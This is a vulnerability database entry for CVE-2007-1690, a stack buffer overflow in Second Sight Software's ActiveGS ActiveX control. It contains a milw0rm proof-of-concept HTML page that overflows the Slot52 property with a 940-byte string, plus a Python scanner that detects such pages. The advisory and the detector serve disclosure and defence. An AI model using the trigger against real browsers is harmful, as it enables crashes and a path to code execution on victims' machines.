Second Sight Software Multiple ActiveX Controls Stack Buffer Overflow Vulnerability

Vulnerability ID: 1112786    Vulnerability type: Buffer overflow
Published: 2007-04-24    Updated: 2007-04-24
CVE ID: CVE-2007-1690    CNNVD ID: CNNVD-200704-382
Platform: Windows    CVSS score: 6.8
|Vulnerability source
https://www.exploit-db.com/exploits/3788
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-382
|Vulnerability details
ActiveGS and ActiveMod are both ActiveX controls provided by Second Sight Software, used respectively to emulate the Apple IIGS and to play music. The implementations of the ActiveGS and ActiveMod controls contain stack buffer overflow vulnerabilities that a remote attacker could exploit to take control of a user's machine. If a user is tricked into viewing a malicious HTML document, the stack overflow in these controls can be triggered, leading to execution of arbitrary code.
|Vulnerability exploit (PoC)
<!--

  ===============================================================================================
                        Second Sight Software ActiveGS.ocx ActiveX Buffer Overflow POC
                                            By Umesh Wanve 
  ==============================================================================================   
        
  Date : 24-04-2007
 
  Tested on Windows 2000 SP4 Server English
            Windows 2000 SP4 Professional English
   
  Reference: http://www.securityfocus.com/bid/23554

  Vendor: http://www.freetoolsassociation.com
          http://www.freetoolsassociation.com/fta/activegs/activegs.cab 

 
  Desc: Many parameters of CLSID 052DF14F-6F28-44A0-9130-294FDA6176EB are vulnerable. This ActiveX control gives an error like
        "Buffer Overrun detected". It is compiled with the /GS flag. All the vulnerable parameters are
        Slot51, Slot52, Slot61, Slot62, Slot7, Slot71, Slot72.

  PS. This was written for educational purposes. Use it at your own risk. The author will not be
      responsible for any damage.
 
  Always thanks to Metasploit and Stroke.

-->


<html>

<title>
 Second Sight Software ActiveGS.ocx ActiveX Buffer Overflow POC- By Umesh Wanve
</title>

<body>
<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:052DF14F-6F28-44A0-9130-294FDA6176EB" > </OBJECT>

<script language="vbscript">
targetFile = "C:\Research\activegs\ActiveGS.ocx"
prototype  = "Invoke_Unknown Slot52 As String"
memberName = "Slot52"
progid     = "ActiveGSLib.ActiveGS"
argCount   = 1

arg1=String(940, "A")

target.Slot52 = arg1


</script>

</body>

</html>

# milw0rm.com [2007-04-24]
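As an added example for defenders (not part of the advisory or of the PoC above), the following Python scanner flags HTML pages that instantiate the ActiveGS CLSID and assign oversized strings to the Slot* properties named in the advisory, following the same VBScript pattern the PoC uses. The 256-byte threshold and the embedded sample page are assumptions constructed for the example.

```python
import re

ACTIVEGS_CLSID = "052DF14F-6F28-44A0-9130-294FDA6176EB"  # CLSID and Slot* names come from the advisory above
VULNERABLE_PROPS = {"slot51", "slot52", "slot61", "slot62", "slot7", "slot71", "slot72"}
LENGTH_THRESHOLD = 256  # assumed cut-off; the PoC above uses 940 bytes

_TAG = re.compile(r"<object\b([^>]*)>", re.I)
_ATTR = re.compile(r'(\w+)\s*=\s*"?([^"\s>]+)"?')
_STRING_FN = re.compile(r'String\s*\(\s*(\d+)\s*,\s*"[^"]*"\s*\)', re.I)  # VBScript String(n, ch)
_LITERAL = re.compile(r'"([^"]*)"')
_ASSIGN = re.compile(r"^\s*(?:(\w+)\.)?(\w+)\s*=\s*(.+?)\s*$", re.M)  # obj.prop = expr / var = expr


def estimate_length(expr, env):
    """Rough byte length of a VBScript string expression: String(n, c) calls,
    quoted literals and previously assigned variables (looked up in env) are summed."""
    total = sum(int(n) for n in _STRING_FN.findall(expr))
    rest = _STRING_FN.sub("", expr)
    total += sum(len(s) for s in _LITERAL.findall(rest))
    rest = _LITERAL.sub("", rest)
    total += sum(env.get(tok.lower(), 0) for tok in re.findall(r"\b\w+\b", rest))
    return total


def scan_html(html):
    """Return (object id, property, estimated length) for every oversized assignment
    to a vulnerable Slot* property of an <object> instantiating the ActiveGS CLSID."""
    targets = set()
    for m in _TAG.finditer(html):
        attrs = {k.lower(): v for k, v in _ATTR.findall(m.group(1))}
        if attrs.get("classid", "").lower() == f"clsid:{ACTIVEGS_CLSID.lower()}":
            targets.add(attrs.get("id", "").lower())
    findings, env = [], {}
    for obj, name, rhs in _ASSIGN.findall(html):
        length = estimate_length(rhs, env)
        if not obj:
            env[name.lower()] = length  # plain variable: remember it for later use
        elif obj.lower() in targets and name.lower() in VULNERABLE_PROPS and length > LENGTH_THRESHOLD:
            findings.append((obj, name, length))
    return findings


# Constructed sample page mirroring the PoC's pattern (not a real capture).
SAMPLE_HTML = """\
<OBJECT id="target" classid="clsid:052DF14F-6F28-44A0-9130-294FDA6176EB"> </OBJECT>
<script language="vbscript">
arg1 = String(940, "A")
target.Slot52 = arg1
target.Slot7 = "short"
</script>
"""
```

Running `scan_html(SAMPLE_HTML)` reports the 940-byte Slot52 assignment and ignores the short Slot7 one; the length estimate is a heuristic and will undercount strings built in ways the regexes do not model.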
|References

Source: VU#118737
Name: VU#118737
Link: http://www.kb.cert.org/vuls/id/118737
Source: OSVDB
Name: 34326
Link: http://osvdb.org/34326
Source: XF
Name: activegs-slot-bo(33759)
Link: http://xforce.iss.net/xforce/xfdb/33759
Source: BID
Name: 23554
Link: http://www.securityfocus.com/bid/23554
Source: VUPEN
Name: ADV-2007-1454
Link: http://www.frsirt.com/english/advisories/2007/1454
Source: SECUNIA
Name: 24960
Link: http://secunia.com/advisories/24960